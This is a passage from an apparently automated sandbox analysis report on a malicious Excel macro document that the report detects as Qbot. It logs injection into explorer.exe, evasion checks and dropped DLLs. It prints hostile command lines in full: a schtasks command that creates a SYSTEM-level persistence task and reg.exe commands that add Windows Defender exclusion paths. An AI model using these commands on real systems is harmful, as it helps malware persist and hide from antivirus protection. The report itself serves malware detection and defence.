Source: Celod.wac1.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 44475.7050777778[3].dat.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Celod.wac2.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Celod.wac.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................p.,..........&8.....(.P...............................................................................................,.....
Source: C:\Windows\System32\reg.exe Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........X.......N.......(...............
Source: C:\Windows\System32\reg.exe Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........h.......N.......(...............
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac1
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac1
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kzlufjnad /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac\'' /SC ONCE /Z /ST 16:57 /ET 17:09
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Celod.wac'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac2
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac2
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fmjlcuic' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Adbwawqor' /d '0'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Application Data\Microsoft\Forms
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD661.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@33/12@0/3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01D565 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 4_2_6E01D565
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCB30AA StartServiceCtrlDispatcherA, 12_2_6DCB30AA
Source: Document_748968552-10062021.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01ABE5 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle, 4_2_6E01ABE5
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{DDAB7EF0-BC80-4CD4-8767-0F84BCCC1E07}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{C5EE0482-80B4-45C1-874A-DA1DE38D1DCA}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{319FAA35-9682-4998-839E-F081E0B05758}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{C5EE0482-80B4-45C1-874A-DA1DE38D1DCA}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{319FAA35-9682-4998-839E-F081E0B05758}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\Global\{DDAB7EF0-BC80-4CD4-8767-0F84BCCC1E07}
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01A55C FindResourceA, 4_2_6E01A55C
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Window found: window name: SysTabControl32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.489853323.00000000028E0000.00000004.00000001.sdmp
Source: Binary string: c:\Think\Evening\Plan\Base\Think.pdb source: regsvr32.exe, 00000004.00000002.489763377.000000006E083000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.582378510.000000006DED3000.00000002.00020000.sdmp, explorer.exe, 00000007.00000003.490164469.00000000028E0000.00000004.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E031A60 pushfd ; retf 4_2_6E031A61
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E035714 push ss; ret 4_2_6E03572B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E033B85 pushad ; ret 4_2_6E033B86
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E0318E3 push esi; retf 4_2_6E0318EA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E034DB1 pushfd ; iretd 4_2_6E034DB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE84DB1 pushfd ; iretd 6_2_6DE84DB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE818E3 push esi; retf 6_2_6DE818EA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE83B85 pushad ; ret 6_2_6DE83B86
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE85714 push ss; ret 6_2_6DE8572B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE81A60 pushfd ; retf 6_2_6DE81A61
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_0009A00E push ebx; ret 7_2_0009A00F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_0009D485 push FFFFFF8Ah; iretd 7_2_0009D50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_0009D4B6 push FFFFFF8Ah; iretd 7_2_0009D50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_00099D5C push cs; iretd 7_2_00099E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_00099E5E push cs; iretd 7_2_00099E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_0009BB21 push esi; iretd 7_2_0009BB26
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCD4DB1 pushfd ; iretd 12_2_6DCD4DB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCD18E3 push esi; retf 12_2_6DCD18EA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCD3B85 pushad ; ret 12_2_6DCD3B86
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCD5714 push ss; ret 12_2_6DCD572B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCD1A60 pushfd ; retf 12_2_6DCD1A61
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB24DB1 pushfd ; iretd 15_2_6DB24DB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB218E3 push esi; retf 15_2_6DB218EA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB23B85 pushad ; ret 15_2_6DB23B86
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB25714 push ss; ret 15_2_6DB2572B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB21A60 pushfd ; retf 15_2_6DB21A61
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0009A00E push ebx; ret 16_2_0009A00F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0009D485 push FFFFFF8Ah; iretd 16_2_0009D50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0009D4B6 push FFFFFF8Ah; iretd 16_2_0009D50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00099D5C push cs; iretd 16_2_00099E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00099E5E push cs; iretd 16_2_00099E32
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01DFEF LoadLibraryA,GetProcAddress, 4_2_6E01DFEF
PE file contains an invalid checksum
Source: Celod.wac2.25.dr Static PE information: real checksum: 0x10be8f should be: 0x9861
Source: Celod.wac.7.dr Static PE information: real checksum: 0x10be8f should be: 0x111590
Source: Celod.wac.17.dr Static PE information: real checksum: 0x10be8f should be: 0x9861
Source: Celod.wac1.16.dr Static PE information: real checksum: 0x10be8f should be: 0x9861

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Celod.wac
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Celod.wac1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Celod.wac2
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac1
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[2].dat
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[1].dat
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac1
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[3].dat
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac1
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac1
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kzlufjnad /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac\'' /SC ONCE /Z /ST 16:57 /ET 17:09
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCB30AA StartServiceCtrlDispatcherA, 12_2_6DCB30AA

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 1136 base: 9C102D value: E9 9B 4C 6C FF
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 572 base: 9C102D value: E9 9B 4C 6C FF
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2536 base: 9C102D value: E9 9B 4C 74 FF
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2576 base: 9C102D value: E9 9B 4C 71 FF
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2956 Thread sleep count: 47 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2964 Thread sleep count: 45 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 836 Thread sleep time: -144000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2556 Thread sleep count: 49 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1704 Thread sleep count: 45 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2932 Thread sleep count: 60 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 3008 Thread sleep count: 142 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 3008 Thread sleep time: -108000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 668 Thread sleep count: 51 > 30
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\explorer.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[2].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[1].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[3].dat
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\explorer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 4_2_6E01D061
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01AEF6 FindFirstFileW,FindNextFileW, 4_2_6E01AEF6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE6AEF6 FindFirstFileW,FindNextFileW, 6_2_6DE6AEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_0008AEF6 FindFirstFileW,FindNextFileW, 7_2_0008AEF6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCBAEF6 FindFirstFileW,FindNextFileW, 12_2_6DCBAEF6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB0AEF6 FindFirstFileW,FindNextFileW, 15_2_6DB0AEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0008AEF6 FindFirstFileW,FindNextFileW, 16_2_0008AEF6

Anti Debugging:

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E015F63 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError, 4_2_6E015F63
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01DFEF LoadLibraryA,GetProcAddress, 4_2_6E01DFEF
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E11B96F mov eax, dword ptr fs:[00000030h] 4_2_6E11B96F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E11B843 mov eax, dword ptr fs:[00000030h] 4_2_6E11B843
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E11B54E push dword ptr fs:[00000030h] 4_2_6E11B54E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DF6B96F mov eax, dword ptr fs:[00000030h] 6_2_6DF6B96F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DF6B54E push dword ptr fs:[00000030h] 6_2_6DF6B54E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DF6B843 mov eax, dword ptr fs:[00000030h] 6_2_6DF6B843
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DDBB96F mov eax, dword ptr fs:[00000030h] 12_2_6DDBB96F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DDBB54E push dword ptr fs:[00000030h] 12_2_6DDBB54E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DDBB843 mov eax, dword ptr fs:[00000030h] 12_2_6DDBB843
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DC0B96F mov eax, dword ptr fs:[00000030h] 15_2_6DC0B96F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DC0B54E push dword ptr fs:[00000030h] 15_2_6DC0B54E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DC0B843 mov eax, dword ptr fs:[00000030h] 15_2_6DC0B843
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_00085A54 RtlAddVectoredExceptionHandler, 7_2_00085A54

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9C102D
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 130000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 130000 protect: page read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 1136 base: B0000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 1136 base: 9C102D value: E9
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 572 base: B0000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 572 base: 9C102D value: E9
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2536 base: 130000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2536 base: 9C102D value: E9
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2576 base: 80000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2576 base: 9C102D value: E9
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: Document_748968552-10062021.xls, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac1
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kzlufjnad /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac\'' /SC ONCE /Z /ST 16:57 /ET 17:09
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac2
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fmjlcuic' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Adbwawqor' /d '0'
Source: explorer.exe, 00000007.00000002.877913159.0000000000C70000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.877913159.0000000000C70000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000007.00000002.877913159.0000000000C70000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_000831B5 CreateNamedPipeA, 7_2_000831B5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E0197ED GetSystemTimeAsFileTime, 4_2_6E0197ED
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 4_2_6E01D061

Stealing of Sensitive Information:

Yara detected Qbot
Source: Yara match File source: 15.3.regsvr32.exe.1d339d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.regsvr32.exe.1b339d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.explorer.exe.d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.regsvr32.exe.78339d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.explorer.exe.100000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.regsvr32.exe.1b339d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.1f339d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.regsvr32.exe.6db00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.regsvr32.exe.6dcb0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.6e010000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.explorer.exe.100000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.1f339d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.explorer.exe.d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.3.regsvr32.exe.1d339d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.regsvr32.exe.78339d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.6de60000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.561069435.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.485516725.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.877678866.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.583660617.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.877666788.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.579711370.0000000000770000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.639603289.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.645193713.00000000000D0000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Qbot